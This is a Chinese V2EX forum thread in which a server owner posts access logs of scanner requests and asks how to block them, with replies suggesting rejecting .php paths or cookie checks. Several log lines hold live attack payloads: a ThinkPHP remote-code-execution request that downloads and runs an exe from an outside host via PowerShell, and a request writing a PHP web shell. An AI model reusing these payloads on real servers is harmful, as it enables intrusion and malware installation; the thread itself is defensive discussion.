请问一下服务器上老有奇怪的请求,怎么屏蔽

2019-10-21 10:54:10 +08:00
 xwbz2018
46.246.62.176 - - [12/Oct/2019:01:40:24 +0800] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:21 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /elrekt.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /index.php HTTP/1.1" 404 97
139.162.88.63 - - [12/Oct/2019:18:06:31 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
106.14.152.42 - - [12/Oct/2019:19:33:47 +0800] "HEAD /phpinfo.php HTTP/1.1" 404 -
139.162.88.63 - - [12/Oct/2019:19:39:00 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /elrekt.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /index.php HTTP/1.1" 404 97
4715 次点击
所在节点    服务器
6 条回复
lx0758
2019-10-21 13:59:45 +08:00
很明显,这是想扫描你的漏洞
Vegetable
2019-10-21 14:02:15 +08:00
这是热心人士在帮你进行服务器漏洞检查,一旦发现漏洞会通过黑掉你进行提醒.没什么特别好的办法屏蔽吧,我都是无视.
eason1874
2019-10-21 14:05:54 +08:00
挂马机的日常操作,扫描各种 CMS 和框架已经披露的漏洞。

教你个简单粗暴的方法,如果确定整站没有.php,.asp,.jsp 这些结尾的网址,那就直接把这些结尾的访问全部拒了。如果有呢,那用户访问先插 cookie 校验过 cookie 再允许访问,这样可以解决大部分,因为这种机器大多不会存 cookie 的。
xwbz2018
2019-10-21 14:10:48 +08:00
@lx0758 嗯,看出来是想搞事情,服务器是 Linux + Java,不会影响正常使用。。不过请问这种一般怎么处理的呢?
xwbz2018
2019-10-21 14:16:03 +08:00
@Vegetable 热心人士检查几年了。。服务器是 Linux + Java,倒是没多大影响,我就想这些 IP 是不是真实的 IP,然后来一波举报
xwbz2018
2019-10-21 14:21:38 +08:00
@eason1874 #3 谢谢,除了网页资源,其他后缀都重写了。我这返回 404,应该和拒绝效果差不多吧。

以前有些爬虫,加了 robots.txt 少了些。

服务器是无状态的,不太好加 cookie 额

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/611292

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX